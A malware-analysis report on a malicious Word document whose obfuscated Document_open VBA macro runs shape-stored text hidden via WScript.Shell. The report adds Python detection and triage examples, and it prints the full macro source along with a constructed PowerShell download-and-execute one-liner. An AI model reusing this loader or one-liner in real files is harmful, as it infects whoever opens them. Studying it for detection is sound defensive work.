MALICIOUS
Risk Score: 212
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample contains a VBA macro with a Document_Open auto-execution routine. The routine is padded with junk arithmetic and Select Case blocks; the behaviour-carrying lines build a command string from the text of a document shape (Shapes("fbiujpXX").TextFrame.TextRange.Text), instantiate a COM object through a GetObject "new:<CLSID>" moniker instead of CreateObject (CLSID 72C24DD5-D70A-438B-8A42-98424B88AFB8 is WScript.Shell), and invoke Run on that object with window style 0, so the command runs without a visible window. The string "PowerShell" does not appear in the extracted macro source, so the PowerShell reference found by the string scan most likely lives in the shape text the macro reads. Taken together, this hidden-execution chain is consistent with a downloader that fetches and runs a secondary payload. The ClamAV detection on the document confirms the file as malicious.
Heuristics (8)
- ClamAV: Doc.Malware.00536d-6764534-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6764534-0
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script, shown with its neighbours:
  End Select
  Set Ewdri = CVar(GetObject(ouqjA + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + mBTzdSUYj))
  On Error Resume Next
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script, shown with its neighbours:
  Attribute VB_Customizable = True
  Private Sub Document_open()
  On Error Resume Next
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body); this is the standard DrawingML XML namespace, not an attacker-controlled resource.
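The chain the heuristics describe (an auto-exec macro handing a command to WScript.Shell.Run from inside Word) shows up on an endpoint as WINWORD.EXE spawning a script interpreter. The following detection is an added example, not part of the analyzer or of this report: it evaluates Sysmon Event ID 1 style records and alerts on an Office host launching an interpreter, raising severity for hidden-window, policy-bypass, encoded-command and download arguments. The three events are constructed; the report does not show the command line this sample actually runs, so the first record is an assumed downloader one-liner with a placeholder `example.invalid` host, not telemetry from this file.

```python
"""Process-tree detection for an Office host spawning a script interpreter.
Added example (not the analyzer's own code). Events are constructed with
Sysmon Event ID 1 field names; the first command line is an assumption,
not the sample's real payload."""
import re

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Argument patterns matching how macro droppers hide and stage a payload.
SUSPICIOUS_ARGS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+(?:hidden|h|1)\b", re.I),
    "policy bypass": re.compile(r"-nop\b|-noprofile|-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download primitive": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|bitsadmin", re.I),
}

# Constructed events (not from this sample): one malicious, two benign.
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -c "
                    "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')\""},
    # Benign: an administrator running a script from the desktop shell.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    # Benign: Word spawning the 64-bit print spooler helper.
    {"Image": r"C:\Windows\splwow64.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Reasons an event is suspicious; an empty list means no alert.
    The parent/child pairing is the gate, the argument patterns only add
    to the reasons, so a hidden or encoded flag alone never fires."""
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    if parent not in OFFICE_HOSTS or child not in INTERPRETERS:
        return []
    reasons = [f"{parent} spawned {child}"]
    reasons += [label for label, pat in SUSPICIOUS_ARGS.items()
                if pat.search(event["CommandLine"])]
    return reasons


def alerts(events):
    """(command line, reasons) for every event that trips the rule."""
    hits = []
    for event in events:
        reasons = evaluate(event)
        if reasons:
            hits.append((event["CommandLine"], reasons))
    return hits


if __name__ == "__main__":
    for cmd, why in alerts(EVENTS):
        print("ALERT:", cmd, "->", "; ".join(why))
```

Only the first record alerts: the parent/child pair is the high-signal part, and the argument matches are what an analyst would use to triage severity. Because the macro calls Run with window style 0, the child is windowless whether or not `-w hidden` is present, so do not rely on that flag alone.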
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9106 bytes |

SHA-256: c7305b502be0f7c231d3802938f4752edf314a459ad20f86e73d8f32d47e0bb3

Detection:
- ClamAV (on the extracted source): No threats found. The Doc.Malware.00536d-6764534-0 signature listed above fired on the container document, not on this decoded text.
- Obfuscation or payload: likely. 156 of 242 identifiers look randomly generated (e.g. 'FAfIzWWsGWYtKl'), consistent with name-mangling obfuscation.
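The identifier-randomness figure above and the behaviour summarised under Malware Insights can both be reproduced from the decoded source with a few lines of static triage. The script below is an added example, not the analyzer's own code: it scores identifiers for name-mangling, finds auto-execution entry points, resolves GetObject "new:{CLSID}" monikers against a small hand-maintained CLSID table (an assumption; anything not listed is reported as unknown), and lists the sinks where command text is read and executed. Its input is the behaviour-carrying lines of macros.bas copied from the preview with the junk arithmetic and Select Case padding removed, so its counts are for that excerpt, not the 242 identifiers of the full file; the randomness thresholds are tuned on this sample rather than being a general classifier.

```python
"""Static triage of an extracted VBA macro. Added example, not the
analyzer's code: mangled-identifier score, auto-exec entry points,
new:{CLSID} moniker resolution and execution sinks."""
import re

# Constructed input: behaviour-carrying lines of macros.bas from the
# report, junk arithmetic and Select Case padding removed.
SAMPLE_VBA = r'''Attribute VB_Name = "FAfIzWWsGWYtKl"
Private Sub Document_open()
On Error Resume Next
HoACQY = (jcPdjjuFO - Oct(anQGc) * hivGYNWa - Sgn(143288678) - 33543119 + Fix(jXzfSDUB))
Set LrYiNzYwX = Shapes("fbiujpXX")
Ajiwjlj = "" + IFmwCCfO + ckmjCbD + LrYiNzYwX.TextFrame.TextRange.Text + QjhJJZq + IFMqtSY
Set Ewdri = CVar(GetObject(ouqjA + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + mBTzdSUYj))
Const FJjBlq = 0
EnAJW = Array(vPPEFXbhH, Ewdri.Run!(Ajiwjlj, FJjBlq), KJLkLin)
End Sub
'''

# Hand-maintained table of automation CLSIDs reachable via the "new:"
# moniker (assumption: only these are resolved, the rest are "unknown").
KNOWN_CLSIDS = {
    "72C24DD5-D70A-438B-8A42-98424B88AFB8": "WScript.Shell",
    "13709620-C279-11CE-A49E-444553540000": "Shell.Application",
    "0D43FE01-F093-11CF-8940-00A0C9054228": "Scripting.FileSystemObject",
}

# VBA keywords and library members; excluded from identifier scoring.
VBA_BUILTINS = {
    "Attribute", "Private", "Public", "Sub", "Function", "End", "On", "Error",
    "Resume", "Next", "Set", "Const", "Select", "Case", "Dim", "As", "True",
    "False", "Array", "Oct", "Sgn", "Fix", "Int", "Hex", "CLng", "CStr",
    "CByte", "CVar", "GetObject", "CreateObject", "Shapes", "TextFrame",
    "TextRange", "Text", "Run", "Shell",
}

AUTOEXEC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+(Document_Open|Document_Close|AutoOpen|"
    r"Auto_Open|AutoExec|AutoClose|Workbook_Open|Workbook_Activate)\b",
    re.IGNORECASE | re.MULTILINE)
MONIKER_RE = re.compile(r"new:\{?([0-9A-Fa-f-]{36})\}?", re.IGNORECASE)
IDENT_RE = re.compile(r"\b[A-Za-z][A-Za-z0-9_]*\b")
VOWELS = set("aeiouAEIOU")


def looks_random(name):
    """Mangled names are vowel-poor, switch case erratically, or carry
    long consonant runs; thresholds tuned on this sample."""
    if len(name) < 5 or not name.isalpha():
        return False
    vowel_ratio = sum(c in VOWELS for c in name) / len(name)
    switches = sum(a.islower() != b.islower() for a, b in zip(name, name[1:]))
    longest_run = max((len(r) for r in re.findall(r"[^aeiouAEIOU]+", name)), default=0)
    return vowel_ratio < 0.25 or switches >= 4 or longest_run >= 5


def identifier_report(code):
    """(flagged names, total unique non-builtin identifiers); string
    literals are blanked first so quoted data is not scored."""
    stripped = re.sub(r'"[^"]*"', '""', code)
    idents = sorted(set(IDENT_RE.findall(stripped)) - VBA_BUILTINS)
    return [i for i in idents if looks_random(i)], len(idents)


def autoexec_entry_points(code):
    return [m.group(1) for m in AUTOEXEC_RE.finditer(code)]


def resolve_monikers(code):
    """Every new:{CLSID} moniker mapped to a ProgID or 'unknown CLSID'."""
    return [(c.upper(), KNOWN_CLSIDS.get(c.upper(), "unknown CLSID"))
            for c in MONIKER_RE.findall(code)]


def execution_sinks(code):
    """(line number, description) for command-text sources and Run calls;
    a Run whose second argument resolves to 0 is a hidden window."""
    consts = dict(re.findall(r"^\s*Const\s+(\w+)\s*=\s*(\d+)", code, re.M))
    sinks = []
    for ln, line in enumerate(code.splitlines(), 1):
        if ".TextFrame.TextRange.Text" in line:
            sinks.append((ln, "command text read from a document shape"))
        m = re.search(r"\.Run!?\s*\(\s*(\w+)\s*,\s*(\w+)", line)
        if m:
            style = consts.get(m.group(2), m.group(2))
            hidden = " with window style 0 (hidden)" if style == "0" else ""
            sinks.append((ln, f"Run({m.group(1)}, {m.group(2)}){hidden}"))
    return sinks


def triage(code):
    flagged, total = identifier_report(code)
    return {"autoexec": autoexec_entry_points(code),
            "mangled_identifiers": f"{len(flagged)} of {total}",
            "monikers": resolve_monikers(code),
            "sinks": execution_sinks(code)}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

On the excerpt the moniker resolves to WScript.Shell, the only entry point is Document_open, and the two sinks are the shape read and the Run call whose window-style constant is 0. Resolving the CLSID is the step worth keeping in any macro triage pipeline: a "new:" moniker carries no ProgID string, so a check that only greps for "WScript.Shell" or CreateObject misses it.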
Preview script: first 1,000 lines of the extracted script (the macro is 215 lines, so it is shown in full)
Attribute VB_Name = "FAfIzWWsGWYtKl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
HoACQY = (jcPdjjuFO - Oct(anQGc) * hivGYNWa - Sgn(143288678) - 33543119 + Fix(jXzfSDUB) + 3040033139# + 231324654 / 294254959 / pUzloPBzE)
Select Case BSYURUW
Case 37902714
HbwOiQYI = CLng(234415112)
FiDpmGmab = Int(KUHjBVfH)
Case 323852693
ziotlRqG = Hex(99963174)
QHRAzww = CStr(191544228 * CByte(OfuuXimT))
End Select
On Error Resume Next
AXDsdiAC = (LZOqVK - Oct(rWzAr) * NZPaR - Sgn(159165490) - 173836489 + Fix(ABAaJihZ) + 1615969149 + 164311630 / 43959458 / mCaVpQi)
Select Case LSUlw
Case 2780115
dcCNb = CLng(183034220)
LYOPMcXS = Int(YtQNKwulB)
Case 271676517
VhjOiI = Hex(161339160)
wVLiz = CStr(20334341 * CByte(CGZDGktUw))
End Select
On Error Resume Next
zUvnb = (OkNPHPR - Oct(CKIlqwL) * cNCWKLIoO - Sgn(8185466) - 12852306 + Fix(DzkiDXa) + 2174644989# + 341913130 / 317621340 / YiKCsGlcB)
Select Case ErhkFSDb
Case 165863507
GNoXE = CLng(172777780)
iSXivjQ = Int(ozIQhcY)
Case 1291482
zFDuzFWF = Hex(176049624)
qKunzScCK = CStr(196126880 * CByte(JLQGR))
End Select
On Error Resume Next
CoZQzzj = (EbkMkHpi - Oct(cqrqcuFXq) * JVSHiDIC - Sgn(230399101) - 191256509 + Fix(jHVvM) + 2607844859# + 96354877 / 247424474 / mMCFSdLi)
Select Case tUtJNaS
Case 253127075
BIbFGF = CLng(272812185)
jWuQGqlBz = Int(TMpFsadpI)
Case 74202221
tvdZTNd = Hex(86978657)
FwQYtpoJ = CStr(257379903 * CByte(IINdwZi))
End Select
Set LrYiNzYwX = Shapes("fbiujpXX")
On Error Resume Next
iwvtQts = (zwrjW - Oct(tcwOMGKv) * UbSDAJhN - Sgn(144459639) - 251476901 + Fix(ATGXZk) + 548722719 + 84962064 / 131911859 / KHnWWzC)
Select Case snPjQ
Case 174519758
zprsRl = CLng(143999246)
KoZWbobwz = Int(BKUfhdL)
Case 206995689
dwwQD = Hex(210837934)
bvQUC = CStr(296422375 * CByte(NchzbaRQ))
End Select
On Error Resume Next
iEkvEZ = (flNRVzw - Oct(CMIRtu) * TvAJh - Sgn(297718464) - 210741429 + Fix(ZoGahuKwN) + 1537320879 + 28533274 / 32655571 / NYRYJ)
Select Case LYpCzaj
Case 247716181
vusfznod = CLng(103868188)
PRsQvup = Int(wFWilYVU)
Case 163307639
mIzAIVAS = Hex(204409385)
FPYvBzt = CStr(36944450 * CByte(ItIIlh))
End Select
On Error Resume Next
CRwcAz = (pYXufwcM - Oct(AFVzzQB) * IrTsEjlvc - Sgn(21156597) - 200190861 + Fix(tjGlLpNFE) + 819484279 + 183699852 / 48201939 / TFaHQP)
Select Case QEUJjpkp
Case 252287609
CvwQkRzkl = CLng(64332013)
vpvPM = Int(ldKnMns)
Case 200424298
PzEWFYTF = Hex(63022435)
JAiobXfF = CStr(228974262 * CByte(OYtUOzL))
End Select
On Error Resume Next
ROJblEEjH = (jGuqPHhw - Oct(pimjPhaN) * tfoHu - Sgn(166090225) - 274857245 + Fix(qEwzkiBo) + 1686895409 + 223058809 / 143173820 / tfUrjY)
Select Case ifutLr
Case 7755327
cAbMVAbRc = CLng(327080428)
FAlvpAEv = Int(NKzXV)
Case 46381346
IvLnIj = Hex(263498371)
ozVARRN = CStr(290422507 * CByte(CTRtjFtGv))
End Select
Ajiwjlj = "" + IFmwCCfO + ckmjCbD + LrYiNzYwX.TextFrame.TextRange.Text + QjhJJZq + IFMqtSY
On Error Resume Next
hObcB = (EjrYsjPOA - Oct(qmwmcvtLT) * RPUZBj - Sgn(52853806) - 30710505 + Fix(jjZsNPh) + 2934902469# + 306105290 / 167085508 / PjORYPORb)
Select Case UPIlapLR
Case 155351479
bLpTP = CLng(115758818)
lXuCzmXAk = Int(DAlVq)
Case 195173566
LQQGmaWa = Hex(150753811)
UDqvBG = CStr(144617306 * CByte(ujjVdlk))
End Select
On Error Resume Next
zwIzHlOaZ = (JClGnTzRa - Oct(SjXttqL) * HGclobo - Sgn(288946867) - 69839727 + Fix(scCdkb) + 451962509 + 201651147 / 132841807 / IksAuf)
Select Case NbPERZn
Case 122909175
UXNJRv = CLng(57102574)
ZwbpzvmO = Int(BSXOcrJ)
Case 22277359
QvIaCPK = Hex(116440399)
jRKtM = CStr(183616865 * CByte(awEjN))
End Select
On Error Resume Next
jGWXvokzR = (XRDLKS - Oct(tTbGRzojP) * pwzjvizBH - Sgn(256610098) - 86386642 + Fix(vloWqiRZ) + 2465488339# + 324595828 / 267343227 / NQMqS)
Select Case iqfov
Case 20109044
fciEKD = CLng(206832134)
LXpSuJG = Int(pNrHwS)
Case 203796951
JiAEWCG = Hex(279084661)
CKGiVauJ = CStr(143421411 * CByte(sWYXz))
End Select
On Error Resume Next
bXrfwbvVn = (wwzKM - Oct(RwzOz) * MqNBrKtn - Sgn(40210016) - 105866463 + Fix(XLcufF) + 110322309 + 339323102 / 279564506 / htjAwJRht)
Select Case zvpLASwk
Case 241282756
AzjiZzk = CLng(95816955)
tvOHtizi = Int(tBbFN)
Case 203874349
cVRuNJ = Hex(116362410)
OriNAa = CStr(335523060 * CByte(Dwzpkov))
End Select
Set Ewdri = CVar(GetObject(ouqjA + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + mBTzdSUYj))
On Error Resume Next
WLnjSQtPd = (zEMwhR - Oct(pHRIYBYca) * pVlOaJYlQ - Sgn(155487012) - 206008469 + Fix(KLGmr) + 2035115279 + 93900100 / 105892582 / SwGrMz)
Select Case wKOHrVDu
Case 283380977
YuoMR = CLng(302140101)
ozFClK = Int(OKiXZfWOJ)
Case 252083884
GIYJoIMv = Hex(269921279)
TcDAC = CStr(263270989 * CByte(OukNz))
End Select
On Error Resume Next
pJDidw = (DUiEzYw - Oct(YVplwitsj) * YOviXlMXz - Sgn(287299774) - 127661044 + Fix(YFZvHQ) + 1126630229 + 267096907 / 249435963 / OVXmnzchw)
Select Case XjEkZZ
Case 322242017
rcYEiHzjL = CLng(9304548)
cbrNiAa = Int(kwNvS)
Case 311377298
uoApV = Hex(228358253)
YwJVJq = CStr(109150203 * CByte(DnaKTqfV))
End Select
On Error Resume Next
XihzwQKwT = (LXzAFz - Oct(CLUwEL) * NIwjFzusQ - Sgn(52442072) - 11808054 + Fix(GidjStQ) + 3253320559# + 243760066 / 66629173 / dkUfVud)
Select Case STqjqUdsV
Case 117462979
Hrwiqf = CLng(167741261)
CFnNGDhS = Int(lRYwmMiHQ)
Case 339631637
LoAvfSCj = Hex(205736252)
dAwPb = CStr(274200740 * CByte(FkfJBjH))
End Select
Const FJjBlq = 0
On Error Resume Next
TPrCzZj = (LdDEYVzER - Oct(qiDVPRaM) * tGNZhFkH - Sgn(44605893) - 87563822 + Fix(GTiqYLwFS) + 3362848259# + 278861285 / 86808958 / JYQTzzZb)
Select Case kmnwEVwo
Case 94515912
rZaWwMzDV = CLng(144066463)
pDthPJpQJ = Int(nRVjv)
Case 19389211
HaGikzW = Hex(40673425)
BUGAwDFq = CStr(313227133 * CByte(uQoMJXEl))
End Select
On Error Resume Next
iKNqzmQkJ = (LTuLJ - Oct(FLBwo) * uXGEwS - Sgn(259613212) - 328686462 + Fix(RfjpSwSu) + 274383109 + 141289599 / 94208003 / wDPJJAm)
Select Case ZkbIL
Case 108007356
juqwzLVuo = CLng(70643063)
qMnQzaa = Int(wUqvmSAqM)
Case 220204557
bdCGi = Hex(339035963)
XRLaJb = CStr(333013397 * CByte(KZUImAiP))
End Select
EnAJW = Array(vPPEFXbhH, Ewdri.Run!(Ajiwjlj, FJjBlq), KJLkLin)
On Error Resume Next
tBNfL = (WDwjlVM - Oct(HukkA) * DNfvR - Sgn(154639735) - 177770492 + Fix(TSiSLDK) + 2588209659# + 341136237 / 103295658 / raWDEP)
Select Case QYLNnJEbz
Case 212536909
ROnAzkd = CLng(2407874)
JIzUuV = Int(IchJbja)
Case 46308227
KFfZO = Hex(237543396)
iRiBc = CStr(282109780 * CByte(maEwhHb))
End Select
On Error Resume Next
dAXHKZ = (fJNwq - Oct(BvnwTk) * khZPGT - Sgn(30127488) - 13682786 + Fix(ECjsb) + 2821991869# + 168080845 / 203082425 / DOAkSWh)
Select Case NAahFQM
Case 60651216
vbHArUEY = CLng(33938422)
MzoKVI = Int(QWSAPCi)
Case 192525831
EbZwm = Hex(156388877)
rvwXWLtv = CStr(76169672 * CByte(LVfZpE))
End Select
On Error Resume Next
rHDHpHw = (dzXmWzuhX - Oct(skploSK) * NFzZRnI - Sgn(303271704) - 293275591 + Fix(vTdfOppn) + 956785629 + 143843726 / 4485701 / TOVOPqnGS)
Select Case zKtswEjj
Case 199860629
HIlDsMW = CLng(3343364)
BEoiOmiDC = Int(RGlTLWT)
Case 250276954
rlHirXr = Hex(69508930)
RVCUmLR = CStr(213568341 * CByte(fiGPA))
End Select
End Sub